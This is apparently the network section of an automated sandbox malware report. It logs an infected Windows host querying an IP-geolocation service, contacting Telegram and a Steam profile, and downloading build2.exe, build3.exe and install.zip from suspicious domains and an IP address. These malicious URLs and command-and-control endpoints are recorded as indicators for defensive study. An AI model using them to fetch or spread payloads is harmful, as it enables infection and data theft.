Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
api.2ip.ua | 162.0.217.254 | |
t.me | 149.154.167.99 | |
steamcommunity.com | 23.198.103.114 | |
zexeq.com | 95.158.162.200 | |
colisumy.com | 175.126.109.15 |
- TCP Requests
-
-
192.168.56.103:49191 116.203.7.73:80
-
192.168.56.103:49186 149.154.167.99:443t.me
-
192.168.56.103:49187 149.154.167.99:443t.me
-
192.168.56.103:49188 149.154.167.99:443t.me
-
192.168.56.103:49164 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49165 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49166 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49173 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49174 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49175 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49190 184.26.243.205:443steamcommunity.com
-
192.168.56.103:49177 95.158.162.200:80colisumy.com
-
192.168.56.103:49178 95.158.162.200:80colisumy.com
-
192.168.56.103:49179 95.158.162.200:80colisumy.com
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64178 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:62579 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:53673
-
GET
200
https://steamcommunity.com/profiles/76561199497218285
REQUEST
RESPONSE
BODY
GET /profiles/76561199497218285 HTTP/1.1
X-Id: bf58e1879f88b222ba2391682babf9d8
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: steamcommunity.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ *.google-analytics.com https://www.google.com https://www.gstatic.com https://apis.google.com https://recaptcha.net https://www.gstatic.cn/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ *.google-analytics.com https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 21 Apr 2023 08:57:47 GMT
Content-Length: 33638
Connection: keep-alive
Set-Cookie: sessionid=4f98a3817991a244647a6077; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None
GET
200
http://zexeq.com/raud/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
REQUEST
RESPONSE
BODY
GET /raud/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
HTTP/1.1 200 OK
Date: Fri, 21 Apr 2023 08:57:37 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 568
Connection: close
Content-Type: text/html; charset=UTF-8
GET
200
http://colisumy.com/dl/build2.exe
REQUEST
RESPONSE
BODY
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: colisumy.com
HTTP/1.1 200 OK
Date: Fri, 21 Apr 2023 08:57:38 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Last-Modified: Mon, 17 Apr 2023 21:25:40 GMT
ETag: "51200-5f98ed52726c0"
Accept-Ranges: bytes
Content-Length: 332288
Connection: close
Content-Type: application/octet-stream
GET
200
http://zexeq.com/files/1/build3.exe
REQUEST
RESPONSE
BODY
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
HTTP/1.1 200 OK
Date: Fri, 21 Apr 2023 08:57:42 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
ETag: "2600-5c86757379380"
Accept-Ranges: bytes
Content-Length: 9728
Connection: close
Content-Type: application/x-msdownload
GET
200
http://116.203.7.73/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
X-Id: bf58e1879f88b222ba2391682babf9d8
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Host: 116.203.7.73
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 21 Apr 2023 08:57:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://116.203.7.73/install.zip
REQUEST
RESPONSE
BODY
GET /install.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Host: 116.203.7.73
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 21 Apr 2023 08:57:49 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: "631f30d3-28faef"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49190 184.26.243.205:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com | b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5 |
Snort Alerts
No Snort Alerts